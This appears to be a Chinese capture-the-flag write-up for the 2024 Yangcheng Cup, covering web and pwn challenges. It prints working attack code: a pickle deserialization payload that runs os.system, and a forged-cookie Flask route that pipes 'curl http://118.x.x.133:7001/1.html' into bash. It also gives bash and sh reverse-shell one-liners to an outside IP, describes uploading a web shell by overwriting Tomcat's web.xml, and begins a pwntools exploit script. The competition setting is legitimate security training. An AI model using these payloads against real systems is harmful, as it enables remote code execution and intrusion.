点击蓝字
关注我们
声明
本文作者:CTF战队
本文字数:150369字
阅读时长:约50分钟
附件/链接:点击查看原文下载
本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。
狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
❝
羊城杯 · 2024
https://2024ycb.dasctf.com
WEB
Lyrics For You
python 的 3.10.7目录穿越任意文件读
读源码读密钥
打pickle伪造user数据来打picklebypass 一下 waf
# -*-coding:utf-8-*-
import pickle
import base64
a = b"""(cos
system
S'sleep 5'
o."""
print(base64.b64encode(a))
bash -i >& /dev/tcp/118.xx.xx.133/5555 0>&1
有个 cookie_check这里有个检测要让cookie为byte本地改了个路由,反弹shell的命令直接在这里写会因为转义不能成功执行,这样请求远程然后再弹
@app.route("/login", methods=['POST', 'GET'])
def login():
if request.method == 'POST':
username = request.form["username"]
user = UserData(username)
#res = {"username": user.username}
a = b"""(cos
system
S'curl http://118.x.x.133:7001/1.html|bash'
o."""
res = a
return set_cookie("user", res, secret=secret_code)
return render_template_string('login.html')
成了
远程通
sh -i >& /dev/tcp/118.x.x.133/5555 0>&1
ntomtom2
这样可以读文件admin/This_is_my_favorite_passwd 传什么都传不上去 可以传 xml传完了可以访问可以通过path指定传的目录 那么我想开启tomcat-manager,如果有热部署会不会直接覆盖确实可以写进去,但没能访问到尝试覆盖web.xml,解析 xml 为 jsp上传的 shell 可以成功连接,拿到 flag
Pwn
pstack
0x10大小的栈溢出,栈迁移即可
from pwn import *
from pwncli import *
from LibcSearcher import *
import sys
s = lambda data :io.send(data)
sa = lambda tag,data :io.sendafter(tag, data)
sl = lambda data :io.sendline(data)
sla = lambda tag,data :io.sendlineafter(tag, data)
r = lambda num=4096 :io.recv(num)
ru = lambda tag, drop=True :io.recvuntil(tag, drop)
p = lambda s: print(' 33[1;31;40m%s --> 0x%x